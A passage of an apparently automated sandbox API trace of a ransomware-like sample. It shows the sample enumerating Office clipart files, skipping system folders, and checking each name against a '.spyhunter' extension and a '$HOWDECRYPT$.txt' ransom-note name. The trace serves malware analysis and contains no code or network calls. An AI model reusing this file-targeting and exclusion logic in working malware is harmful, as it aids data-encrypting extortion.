Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 67 [0097.801] StrStrIW (lpFirst="HH00334_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.801] lstrcmpW (lpString1="HH00334_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.801] lstrcmpW (lpString1="HH00334_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.801] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 67 [0097.801] GetProcessHeap () returned 0x2c0000 [0097.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c123a0 [0097.801] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e90) returned 0x2c310e0 [0097.801] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.801] lstrcmpiW (lpString1="HH00443_.WMF", lpString2="Windows") returned -1 [0097.801] lstrlenW (lpString="Windows") returned 7 [0097.801] lstrcmpiW (lpString1="HH00443_.WMF", lpString2="$Recycle.bin") returned 1 [0097.801] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.801] lstrcmpiW (lpString1="HH00443_.WMF", lpString2="System Volume Information") returned -1 [0097.801] lstrlenW (lpString="System Volume Information") returned 25 [0097.801] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 67 [0097.801] StrStrIW (lpFirst="HH00443_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.801] lstrcmpW (lpString1="HH00443_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.802] lstrcmpW (lpString1="HH00443_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.802] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 67 [0097.802] GetProcessHeap () returned 0x2c0000 [0097.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c12470 [0097.802] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e98) returned 0x2c310e0 [0097.802] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.802] lstrcmpiW (lpString1="HH00513_.WMF", lpString2="Windows") returned -1 [0097.802] lstrlenW (lpString="Windows") returned 7 [0097.802] lstrcmpiW (lpString1="HH00513_.WMF", lpString2="$Recycle.bin") returned 1 [0097.802] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.802] lstrcmpiW (lpString1="HH00513_.WMF", lpString2="System Volume Information") returned -1 [0097.802] lstrlenW (lpString="System Volume Information") returned 25 [0097.802] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 67 [0097.802] StrStrIW (lpFirst="HH00513_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.802] lstrcmpW (lpString1="HH00513_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.802] lstrcmpW (lpString1="HH00513_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.802] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 67 [0097.802] GetProcessHeap () returned 0x2c0000 [0097.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c12540 [0097.802] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ea0) returned 0x2c310e0 [0097.802] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.802] lstrcmpiW (lpString1="HH00524_.WMF", lpString2="Windows") returned -1 [0097.803] lstrlenW (lpString="Windows") returned 7 [0097.803] lstrcmpiW (lpString1="HH00524_.WMF", lpString2="$Recycle.bin") returned 1 [0097.803] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.803] lstrcmpiW (lpString1="HH00524_.WMF", lpString2="System Volume Information") returned -1 [0097.803] lstrlenW (lpString="System Volume Information") returned 25 [0097.803] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 67 [0097.803] StrStrIW (lpFirst="HH00524_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.803] lstrcmpW (lpString1="HH00524_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.803] lstrcmpW (lpString1="HH00524_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.803] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 67 [0097.803] GetProcessHeap () returned 0x2c0000 [0097.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c12610 [0097.803] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ea8) returned 0x2c310e0 [0097.803] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.803] lstrcmpiW (lpString1="HH00526_.WMF", lpString2="Windows") returned -1 [0097.803] lstrlenW (lpString="Windows") returned 7 [0097.803] lstrcmpiW (lpString1="HH00526_.WMF", lpString2="$Recycle.bin") returned 1 [0097.803] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.803] lstrcmpiW (lpString1="HH00526_.WMF", lpString2="System Volume Information") returned -1 [0097.834] lstrlenW (lpString="System Volume Information") returned 25 [0097.834] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 67 [0097.835] StrStrIW (lpFirst="HH00526_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.835] lstrcmpW (lpString1="HH00526_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.835] lstrcmpW (lpString1="HH00526_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.835] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 67 [0097.835] GetProcessHeap () returned 0x2c0000 [0097.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c126e0 [0097.835] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1eb0) returned 0x2c310e0 [0097.835] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.835] lstrcmpiW (lpString1="HH00527_.WMF", lpString2="Windows") returned -1 [0097.835] lstrlenW (lpString="Windows") returned 7 [0097.835] lstrcmpiW (lpString1="HH00527_.WMF", lpString2="$Recycle.bin") returned 1 [0097.835] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.835] lstrcmpiW (lpString1="HH00527_.WMF", lpString2="System Volume Information") returned -1 [0097.835] lstrlenW (lpString="System Volume Information") returned 25 [0097.835] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 67 [0097.835] StrStrIW (lpFirst="HH00527_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.835] lstrcmpW (lpString1="HH00527_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.835] lstrcmpW (lpString1="HH00527_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.835] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 67 [0097.835] GetProcessHeap () returned 0x2c0000 [0097.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c127b0 [0097.836] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1eb8) returned 0x2c310e0 [0097.836] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.836] lstrcmpiW (lpString1="HH00546_.WMF", lpString2="Windows") returned -1 [0097.836] lstrlenW (lpString="Windows") returned 7 [0097.836] lstrcmpiW (lpString1="HH00546_.WMF", lpString2="$Recycle.bin") returned 1 [0097.836] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.836] lstrcmpiW (lpString1="HH00546_.WMF", lpString2="System Volume Information") returned -1 [0097.836] lstrlenW (lpString="System Volume Information") returned 25 [0097.836] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 67 [0097.836] StrStrIW (lpFirst="HH00546_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.836] lstrcmpW (lpString1="HH00546_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.836] lstrcmpW (lpString1="HH00546_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.836] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 67 [0097.836] GetProcessHeap () returned 0x2c0000 [0097.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c12880 [0097.836] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ec0) returned 0x2c310e0 [0097.836] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.836] lstrcmpiW (lpString1="HH00601_.WMF", lpString2="Windows") returned -1 [0097.836] lstrlenW (lpString="Windows") returned 7 [0097.836] lstrcmpiW (lpString1="HH00601_.WMF", lpString2="$Recycle.bin") returned 1 [0097.836] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.837] lstrcmpiW (lpString1="HH00601_.WMF", lpString2="System Volume Information") returned -1 [0097.837] lstrlenW (lpString="System Volume Information") returned 25 [0097.837] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 67 [0097.837] StrStrIW (lpFirst="HH00601_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.837] lstrcmpW (lpString1="HH00601_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.837] lstrcmpW (lpString1="HH00601_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.837] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 67 [0097.837] GetProcessHeap () returned 0x2c0000 [0097.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c12950 [0097.837] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ec8) returned 0x2c310e0 [0097.837] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.837] lstrcmpiW (lpString1="HH00602_.WMF", lpString2="Windows") returned -1 [0097.837] lstrlenW (lpString="Windows") returned 7 [0097.837] lstrcmpiW (lpString1="HH00602_.WMF", lpString2="$Recycle.bin") returned 1 [0097.837] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.837] lstrcmpiW (lpString1="HH00602_.WMF", lpString2="System Volume Information") returned -1 [0097.837] lstrlenW (lpString="System Volume Information") returned 25 [0097.837] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 67 [0097.837] StrStrIW (lpFirst="HH00602_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.837] lstrcmpW (lpString1="HH00602_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.837] lstrcmpW (lpString1="HH00602_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.837] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 67 [0097.838] GetProcessHeap () returned 0x2c0000 [0097.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c12a20 [0097.838] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ed0) returned 0x2c310e0 [0097.838] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.838] lstrcmpiW (lpString1="HH00612_.WMF", lpString2="Windows") returned -1 [0097.838] lstrlenW (lpString="Windows") returned 7 [0097.838] lstrcmpiW (lpString1="HH00612_.WMF", lpString2="$Recycle.bin") returned 1 [0097.838] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.838] lstrcmpiW (lpString1="HH00612_.WMF", lpString2="System Volume Information") returned -1 [0097.838] lstrlenW (lpString="System Volume Information") returned 25 [0097.838] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 67 [0097.838] StrStrIW (lpFirst="HH00612_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.838] lstrcmpW (lpString1="HH00612_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.838] lstrcmpW (lpString1="HH00612_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.838] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 67 [0097.838] GetProcessHeap () returned 0x2c0000 [0097.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c12af0 [0097.838] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ed8) returned 0x2c310e0 [0097.838] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.838] lstrcmpiW (lpString1="HH00623_.WMF", lpString2="Windows") returned -1 [0097.838] lstrlenW (lpString="Windows") returned 7 [0097.838] lstrcmpiW (lpString1="HH00623_.WMF", lpString2="$Recycle.bin") returned 1 [0097.839] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.839] lstrcmpiW (lpString1="HH00623_.WMF", lpString2="System Volume Information") returned -1 [0097.839] lstrlenW (lpString="System Volume Information") returned 25 [0097.839] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 67 [0097.839] StrStrIW (lpFirst="HH00623_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.839] lstrcmpW (lpString1="HH00623_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.839] lstrcmpW (lpString1="HH00623_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.839] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 67 [0097.839] GetProcessHeap () returned 0x2c0000 [0097.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c12bc0 [0097.839] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ee0) returned 0x2c310e0 [0097.839] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.839] lstrcmpiW (lpString1="HH00625_.WMF", lpString2="Windows") returned -1 [0097.839] lstrlenW (lpString="Windows") returned 7 [0097.839] lstrcmpiW (lpString1="HH00625_.WMF", lpString2="$Recycle.bin") returned 1 [0097.839] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.839] lstrcmpiW (lpString1="HH00625_.WMF", lpString2="System Volume Information") returned -1 [0097.839] lstrlenW (lpString="System Volume Information") returned 25 [0097.839] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 67 [0097.839] StrStrIW (lpFirst="HH00625_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.839] lstrcmpW (lpString1="HH00625_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.839] lstrcmpW (lpString1="HH00625_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.840] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 67 [0097.840] GetProcessHeap () returned 0x2c0000 [0097.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c12c90 [0097.840] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ee8) returned 0x2c310e0 [0097.840] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.840] lstrcmpiW (lpString1="HH00636_.WMF", lpString2="Windows") returned -1 [0097.840] lstrlenW (lpString="Windows") returned 7 [0097.840] lstrcmpiW (lpString1="HH00636_.WMF", lpString2="$Recycle.bin") returned 1 [0097.840] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.840] lstrcmpiW (lpString1="HH00636_.WMF", lpString2="System Volume Information") returned -1 [0097.840] lstrlenW (lpString="System Volume Information") returned 25 [0097.840] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 67 [0097.840] StrStrIW (lpFirst="HH00636_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.840] lstrcmpW (lpString1="HH00636_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.840] lstrcmpW (lpString1="HH00636_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.840] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 67 [0097.840] GetProcessHeap () returned 0x2c0000 [0097.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c12d60 [0097.840] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ef0) returned 0x2c310e0 [0097.841] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.841] lstrcmpiW (lpString1="HH00669_.WMF", lpString2="Windows") returned -1 [0097.841] lstrlenW (lpString="Windows") returned 7 [0097.841] lstrcmpiW (lpString1="HH00669_.WMF", lpString2="$Recycle.bin") returned 1 [0097.841] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.841] lstrcmpiW (lpString1="HH00669_.WMF", lpString2="System Volume Information") returned -1 [0097.841] lstrlenW (lpString="System Volume Information") returned 25 [0097.841] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 67 [0097.841] StrStrIW (lpFirst="HH00669_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.841] lstrcmpW (lpString1="HH00669_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.841] lstrcmpW (lpString1="HH00669_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.841] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 67 [0097.841] GetProcessHeap () returned 0x2c0000 [0097.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c12e30 [0097.841] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ef8) returned 0x2c310e0 [0097.841] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.841] lstrcmpiW (lpString1="HH00681_.WMF", lpString2="Windows") returned -1 [0097.841] lstrlenW (lpString="Windows") returned 7 [0097.841] lstrcmpiW (lpString1="HH00681_.WMF", lpString2="$Recycle.bin") returned 1 [0097.841] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.841] lstrcmpiW (lpString1="HH00681_.WMF", lpString2="System Volume Information") returned -1 [0097.841] lstrlenW (lpString="System Volume Information") returned 25 [0097.841] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 67 [0097.842] StrStrIW (lpFirst="HH00681_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.842] lstrcmpW (lpString1="HH00681_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.842] lstrcmpW (lpString1="HH00681_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.842] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 67 [0097.842] GetProcessHeap () returned 0x2c0000 [0097.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c12f00 [0097.842] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1f00) returned 0x2c310e0 [0097.842] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.842] lstrcmpiW (lpString1="HH00685_.WMF", lpString2="Windows") returned -1 [0097.842] lstrlenW (lpString="Windows") returned 7 [0097.842] lstrcmpiW (lpString1="HH00685_.WMF", lpString2="$Recycle.bin") returned 1 [0097.842] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.842] lstrcmpiW (lpString1="HH00685_.WMF", lpString2="System Volume Information") returned -1 [0097.842] lstrlenW (lpString="System Volume Information") returned 25 [0097.842] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 67 [0097.842] StrStrIW (lpFirst="HH00685_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.842] lstrcmpW (lpString1="HH00685_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.842] lstrcmpW (lpString1="HH00685_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.842] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 67 [0097.842] GetProcessHeap () returned 0x2c0000 [0097.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c12fd0 [0097.842] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1f08) returned 0x3867e8 [0097.844] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.853] lstrcmpiW (lpString1="HH00687_.WMF", lpString2="Windows") returned -1 [0097.853] lstrlenW (lpString="Windows") returned 7 [0097.853] lstrcmpiW (lpString1="HH00687_.WMF", lpString2="$Recycle.bin") returned 1 [0097.853] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.853] lstrcmpiW (lpString1="HH00687_.WMF", lpString2="System Volume Information") returned -1 [0097.853] lstrlenW (lpString="System Volume Information") returned 25 [0097.853] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 67 [0097.853] StrStrIW (lpFirst="HH00687_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.854] lstrcmpW (lpString1="HH00687_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.854] lstrcmpW (lpString1="HH00687_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.854] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 67 [0097.854] GetProcessHeap () returned 0x2c0000 [0097.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c15dc8 [0097.854] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f08) returned 0x3867e8 [0097.854] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.854] lstrcmpiW (lpString1="HH00688_.WMF", lpString2="Windows") returned -1 [0097.854] lstrlenW (lpString="Windows") returned 7 [0097.854] lstrcmpiW (lpString1="HH00688_.WMF", lpString2="$Recycle.bin") returned 1 [0097.854] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.854] lstrcmpiW (lpString1="HH00688_.WMF", lpString2="System Volume Information") returned -1 [0097.854] lstrlenW (lpString="System Volume Information") returned 25 [0097.854] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 67 [0097.854] StrStrIW (lpFirst="HH00688_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.854] lstrcmpW (lpString1="HH00688_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.854] lstrcmpW (lpString1="HH00688_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.854] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 67 [0097.854] GetProcessHeap () returned 0x2c0000 [0097.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c130a0 [0097.854] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f10) returned 0x3867e8 [0097.854] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.855] lstrcmpiW (lpString1="HH00693_.WMF", lpString2="Windows") returned -1 [0097.855] lstrlenW (lpString="Windows") returned 7 [0097.855] lstrcmpiW (lpString1="HH00693_.WMF", lpString2="$Recycle.bin") returned 1 [0097.855] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.855] lstrcmpiW (lpString1="HH00693_.WMF", lpString2="System Volume Information") returned -1 [0097.855] lstrlenW (lpString="System Volume Information") returned 25 [0097.855] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 67 [0097.855] StrStrIW (lpFirst="HH00693_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.855] lstrcmpW (lpString1="HH00693_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.855] lstrcmpW (lpString1="HH00693_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.855] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 67 [0097.855] GetProcessHeap () returned 0x2c0000 [0097.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c13170 [0097.855] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f18) returned 0x3867e8 [0097.855] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.855] lstrcmpiW (lpString1="HH01013_.WMF", lpString2="Windows") returned -1 [0097.855] lstrlenW (lpString="Windows") returned 7 [0097.855] lstrcmpiW (lpString1="HH01013_.WMF", lpString2="$Recycle.bin") returned 1 [0097.855] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.855] lstrcmpiW (lpString1="HH01013_.WMF", lpString2="System Volume Information") returned -1 [0097.855] lstrlenW (lpString="System Volume Information") returned 25 [0097.855] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 67 [0097.855] StrStrIW (lpFirst="HH01013_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.856] lstrcmpW 